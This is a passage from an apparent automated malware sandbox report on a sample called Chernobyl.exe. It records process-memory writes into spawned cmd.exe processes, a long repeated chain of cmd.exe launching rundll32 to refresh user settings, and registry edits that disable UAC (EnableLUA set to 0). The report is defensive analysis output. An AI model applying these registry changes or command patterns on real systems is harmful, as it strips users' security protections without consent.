Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2812 wrote to memory of 828 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2812 wrote to memory of 828 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2812 wrote to memory of 828 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2812 wrote to memory of 1124 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2812 wrote to memory of 1124 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2812 wrote to memory of 1124 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 828 wrote to memory of 1912 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 828 wrote to memory of 1912 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 828 wrote to memory of 1912 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2812 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2812 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2812 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2812 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2812 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2812 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 1124 wrote to memory of 1168 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 1124 wrote to memory of 1168 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 1124 wrote to memory of 1168 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2812 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2812 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2812 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2812 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2812 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2812 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 1932 wrote to memory of 1664 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 1932 wrote to memory of 1664 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 1932 wrote to memory of 1664 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 1616 wrote to memory of 944 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe
PID 1616 wrote to memory of 944 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe
PID 1616 wrote to memory of 944 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe
PID 2812 wrote to memory of 1108 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2812 wrote to memory of 1108 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2812 wrote to memory of 1108 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2288 wrote to memory of 2284 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2288 wrote to memory of 2284 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2288 wrote to memory of 2284 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2008 wrote to memory of 2308 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2008 wrote to memory of 2308 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2008 wrote to memory of 2308 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2812 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2812 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2812 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2812 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2812 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2812 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 1108 wrote to memory of 1780 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 1108 wrote to memory of 1780 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 1108 wrote to memory of 1780 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2812 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2812 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2812 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 956 wrote to memory of 808 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 956 wrote to memory of 808 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 956 wrote to memory of 808 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2812 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2812 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2812 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 952 wrote to memory of 2960 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 952 wrote to memory of 2960 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 952 wrote to memory of 2960 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2812 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2812 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2812 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2812 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\UseDefaultTile = "1" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe

"C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-18661415541084549064-687029012-380500796265320750-1884029111-1289568299145413653"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-16953254912048192401-276045950-673724962381683991-4469699051509398184-1511253387"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1810036655-172200348893730452-1322726407415403870-182197278-2113052371-1264868574"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1150835332340064281-259588362-1127273452-409818638641984761366656154-1103727545"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1767864022-1308662221-1069213531878456378-1587059530-548800618-1747515438-1251835387"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-12772374311665413587-69129367812137017371237203362870359652-84976767526777496"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1405019126-12243150941044976475-17813914919858660611833369641306924272292556936"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1307127662-107060260311557797023666889281697548855-2939290432042359970-1597695911"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

